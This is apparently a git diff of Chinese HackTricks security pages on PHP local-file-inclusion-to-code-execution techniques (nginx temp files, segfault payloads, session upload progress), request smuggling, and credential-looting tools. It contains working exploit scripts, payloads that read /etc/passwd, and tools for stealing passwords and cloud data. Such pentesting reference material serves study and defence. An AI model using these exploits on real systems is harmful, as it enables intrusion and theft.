/dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon\_inode:\[eventfd] lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:\[27587] lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:\[27589] lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:\[44926] lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:\[44927] lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted) ... \`\`\` 注意:在此示例中,不能直接包含\`/proc/34/fd/15\`,因为PHP的\`include\`函数会将路径解析为\`/var/lib/nginx/body/0000001368 (deleted)\`,而该路径在文件系统中不存在。幸运的是,可以通过一些间接方式绕过这个小限制,比如:\`/proc/self/fd/34/../../../34/fd/15\`,最终将执行已删除的\`/var/lib/nginx/body/0000001368\`文件的内容。 ## 完整利用 \`\`\`python #!/usr/bin/env python3 import sys, threading, requests # exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance # see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details URL = f'http://{sys.argv\[1]}:{sys.argv\[2]}/' # find nginx worker processes r = requests.get(URL, params={ 'file': '/proc/cpuinfo' }) cpus = r.text.count('processor') r = requests.get(URL, params={ 'file': '/proc/sys/kernel/pid\_max' }) pid\_max = int(r.text) print(f'\[\*] cpus: {cpus}; pid\_max: {pid\_max}') nginx\_workers = \[] for pid in range(pid\_max): r = requests.get(URL, params={ 'file': f'/proc/{pid}/cmdline' }) if b'nginx: worker process' in r.content: print(f'\[\*] nginx worker found: {pid}') nginx\_workers.append(pid) if len(nginx\_workers) >= cpus: break done = False # upload a big client body to force nginx to create a /var/lib/nginx/body/$X def uploader(): print('\[+] starting uploader') while not done: requests.get(URL, data=' //'
|
||||
```
|
||||
requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload)))))
|
||||
except:
|
||||
|
@ -55,7 +55,7 @@ def read_file_worker(requests_session, nginx_pid, nginx_pids): # 在循环中扫
|
|||
|
||||
def read_file_multiprocess(requests_session, nginx_pids): for nginx_pid in nginx_pids: p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids)) p.start()
|
||||
|
||||
if __name__ == "main": print('[DEBUG] 创建请求会话') requests_session = create_requests_session() print('[DEBUG] 获取 Nginx pid') nginx_pids = get_nginx_pids(requests_session) print(f'[DEBUG] Nginx pid: {nginx_pids}') print('[DEBUG] 开始发送 payload') send_payload_multiprocess(requests_session) print('[DEBUG] 开始 fd 读取器') read_file_multiprocess(requests_session, nginx_pids)
|
||||
if __name__ == "main": print('[DEBUG] 创建请求会话') requests_session = create_requests_session() print('[DEBUG] 获取 Nginx pid') nginx_pids = get_nginx_pids(requests_session) print(f'[DEBUG] Nginx pid: {nginx_pids}') print('[DEBUG] 开始发送 payload') send_payload_multiprocess(requests_session) print('[DEBUG] 开始 fd 读取') read_file_multiprocess(requests_session, nginx_pids)
|
||||
```
|
||||
```
|
||||
|
||||
|
@ -81,18 +81,19 @@ You can check their website and try their engine for **free** at:
|
|||
|
||||
<div data-gb-custom-block data-tag="embed" data-url='https://whiteintel.io'></div>
|
||||
|
||||
{% hint style="success" %}
|
||||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>Support HackTricks</summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
```
|
||||
|
||||
|
|
|
@ -1,20 +1,21 @@
|
|||
# 通过分段错误实现 LFI2RCE
|
||||
# 通过分段错误实现LFI2RCE
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS 红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持 HackTricks 的其他方式:
|
||||
|
||||
* 如果您想在 HackTricks 中看到您的 **公司广告** 或 **下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
||||
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向 **HackTricks** 和 **HackTricks Cloud** 的 github 仓库提交 PR 来 **分享您的黑客技巧**。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
根据 [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/)(第二部分)和 [https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view) 的报告,以下 payload 在 PHP 中引起了分段错误:
|
||||
根据[https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/)(第二部分)和[https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view),以下载荷导致 PHP 出现分段错误:
|
||||
```php
|
||||
// PHP 7.0
|
||||
include("php://filter/string.strip_tags/resource=/etc/passwd");
|
||||
|
@ -22,9 +23,9 @@ include("php://filter/string.strip_tags/resource=/etc/passwd");
|
|||
// PHP 7.2
|
||||
include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA");
|
||||
```
|
||||
你应该知道,如果你发送一个包含文件的POST请求,PHP会在`/tmp/php<something>`中创建一个临时文件,其中包含该文件的内容。一旦请求被处理,这个文件会被自动删除。
|
||||
你应该知道,如果你发送一个包含文件的**POST**请求,PHP会在`/tmp/php<something>`中创建一个临时文件,其中包含该文件的内容。一旦请求被处理,这个文件将会被自动删除。
|
||||
|
||||
如果你发现一个LFI漏洞,并成功触发了PHP的分段错误,那么这个临时文件将永远不会被删除。因此,你可以利用LFI漏洞搜索这个文件,直到找到并执行任意代码。
|
||||
如果你发现一个**LFI**漏洞,并成功触发了PHP的分段错误,那么这个临时文件将永远不会被删除。因此,你可以利用**LFI**漏洞搜索这个文件,直到找到并执行任意代码。
|
||||
|
||||
你可以使用docker镜像[https://hub.docker.com/r/easyengine/php7.0](https://hub.docker.com/r/easyengine/php7.0)进行测试。
|
||||
```python
|
||||
|
@ -69,16 +70,17 @@ bruteforce(charset)
|
|||
if __name__ == "__main__":
|
||||
main()
|
||||
```
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
其他支持HackTricks的方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,22 +1,23 @@
|
|||
# 通过 PHP\_SESSION\_UPLOAD\_PROGRESS 进行 LFI2RCE
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技能:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技能:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS 红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持 HackTricks 的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** 上**关注我们。
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## 基本信息
|
||||
|
||||
如果您发现了一个**本地文件包含**漏洞,即使您**没有会话**且 `session.auto_start` 为 `Off`。如果 **`session.upload_progress.enabled`** 为 **`On`**,并且您在**多部分 POST** 数据中提供了 **`PHP_SESSION_UPLOAD_PROGRESS`**,PHP 将**为您启用会话**。
|
||||
如果你发现了一个**本地文件包含**漏洞,即使你**没有会话**且 `session.auto_start` 是 `Off`。如果 **`session.upload_progress.enabled`** 是 **`On`**,并且你在**多部分 POST** 数据中提供了 **`PHP_SESSION_UPLOAD_PROGRESS`**,PHP 将会**为你启用会话**。
|
||||
```bash
|
||||
$ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange'
|
||||
$ ls -a /var/lib/php/sessions/
|
||||
|
@ -30,10 +31,10 @@ $ ls -a /var/lib/php/sessions/
|
|||
|
||||
In the last example the session will contain the string blahblahblah
|
||||
```
|
||||
请注意,使用 **`PHP_SESSION_UPLOAD_PROGRESS`** 您可以**控制会话内的数据**,因此,如果包含您的会话文件,您可以包含您控制的部分(例如一个 PHP shellcode)。
|
||||
请注意,通过 **`PHP_SESSION_UPLOAD_PROGRESS`** 您可以**控制会话内的数据**,因此,如果您包含您的会话文件,您可以包含您控制的部分(例如一个 PHP shellcode)。
|
||||
|
||||
{% hint style="info" %}
|
||||
尽管互联网上的大多数教程建议您将 `session.upload_progress.cleanup` 设置为 `Off` 以进行调试。但 PHP 中默认的 `session.upload_progress.cleanup` 仍然是 `On`。这意味着您的会话中的上传进度将尽快清除。因此,这将是**竞争条件**。
|
||||
尽管互联网上的大多数教程建议您将 `session.upload_progress.cleanup` 设置为 `Off` 以进行调试。但 PHP 中默认的 `session.upload_progress.cleanup` 仍然是 `On`。这意味着您的会话中的上传进度将尽快被清除。因此,这将是**竞争条件**。
|
||||
{% endhint %}
|
||||
|
||||
### 夺旗赛
|
||||
|
@ -42,7 +43,22 @@ In the last example the session will contain the string blahblahblah
|
|||
|
||||
由于 `session.upload_progress.prefix` 的默认设置,我们的**会话文件将以烦人的前缀** `upload_progress_` 开头,例如:`upload_progress_controlledcontentbyattacker`
|
||||
|
||||
**去除初始前缀**的技巧是**将有效载荷进行三次 base64 编码**,然后通过 `convert.base64-decode` 过滤器解码,这是因为**在 base64 解码时 PHP 会删除奇怪的字符**,所以经过 3 次后,只有**攻击者发送的有效载荷**会**保留**(然后攻击者可以控制初始部分)。
|
||||
**去除初始前缀**的技巧是**将有效载荷进行三次 base64 编码**,然后通过 `convert.base64-decode` 过滤器解码,这是因为当**base64 解码 PHP 会移除奇怪的字符**,所以经过 3 次后,只有**攻击者发送的有效载荷**会**保留**(然后攻击者可以控制初始部分)。
|
||||
|
||||
更多信息请查看原始写作 [https://blog.orange.tw/2018/10/](https://blog.orange.tw/2018/10/) 和最终利用 [https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp\_for\_php.py](https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp\_for\_php.py)\
|
||||
另一篇写作在 [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/)
|
||||
更多信息请查看原始写作[https://blog.orange.tw/2018/10/](https://blog.orange.tw/2018/10/) 和最终利用[https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp\_for\_php.py](https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp\_for\_php.py)\
|
||||
另一篇写作在[https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/)
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技能:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技能:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,31 +1,33 @@
|
|||
# 浏览器 HTTP 请求走私
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS 红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持 HackTricks 的其他方式:
|
||||
|
||||
* 如果您想在 HackTricks 中看到您的 **公司广告** 或 **下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
||||
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFT**](https://opensea.io/collection/the-peass-family) 收藏品
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来 **分享您的黑客技巧**。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
**查看文章 [https://portswigger.net/research/browser-powered-desync-attacks](https://portswigger.net/research/browser-powered-desync-attacks)**
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS 红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持 HackTricks 的其他方式:
|
||||
|
||||
* 如果您想在 HackTricks 中看到您的 **公司广告** 或 **下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
||||
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFT**](https://opensea.io/collection/the-peass-family) 收藏品
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来 **分享您的黑客技巧**。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,45 +1,43 @@
|
|||
{% hint style="success" %}
|
||||
学习和实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为英雄</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。**
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
## **本地战利品**
|
||||
|
||||
* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): 这些脚本除了寻找PE向量外,还会在文件系统内查找敏感信息。
|
||||
* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): **LaZagne项目**是一个开源应用程序,用于**检索存储在本地计算机上的大量密码**。每个软件使用不同的技术存储其密码(明文、API、自定义算法、数据库等)。这个工具是为了找到最常用软件的这些密码而开发的。
|
||||
* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng):这些脚本除了寻找 PE 向量外,还会在文件系统中寻找敏感信息。
|
||||
* [**LaZagne**](https://github.com/AlessandroZ/LaZagne):**LaZagne 项目**是一个开源应用程序,用于检索存储在本地计算机上的许多密码。每个软件使用不同的技术(明文、API、自定义算法、数据库等)存储其密码。该工具旨在查找这些最常用软件的密码。
|
||||
|
||||
## **外部服务**
|
||||
|
||||
* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): 这个模块将使用访问令牌连接到Confluence的API,导出为PDF,并下载目标有权访问的Confluence文档。
|
||||
* [**GD-Thief**](https://github.com/antman1p/GD-Thief): 红队工具,用于通过Google Drive API从目标的Google Drive中窃取文件,您(攻击者)可以访问这些文件,包括所有共享文件、所有来自共享驱动器的文件,以及目标有权访问的所有来自域驱动器的文件。
|
||||
* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): 红队工具,用于通过Google的People API窃取您有权访问的目标组织的Google People目录。
|
||||
* [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** 这是一个用Python开发的工具,它使用原生的Slack API从Slack工作区提取'有趣'的信息,前提是有一个访问令牌。
|
||||
* [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound是一个命令行工具,用于红队和蓝队快速对Slack工作区/组织进行侦察。Slackhound使得组织的用户、文件、消息等的收集变得快速可搜索,大型对象被写入CSV以供离线审查。
|
||||
|
||||
|
||||
|
||||
* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief):此模块将使用访问令牌连接到 Confluence 的 API,导出为 PDF,并下载目标可以访问的 Confluence 文档。
|
||||
* [**GD-Thief**](https://github.com/antman1p/GD-Thief):红队工具,用于通过 Google Drive API 从攻击者可以访问的目标的 Google Drive 中窃取文件。这包括所有共享文件、所有来自共享驱动器的文件以及目标可以访问的所有来自域驱动器的文件。
|
||||
* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief):红队工具,用于通过 Google 的 People API 从您可以访问的目标组织的 Google People 目录中窃取信息。
|
||||
* [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:**这是一个用 Python 开发的工具,使用本机 Slack API 从 Slack 工作区提取“有趣”的信息,只需提供访问令牌。
|
||||
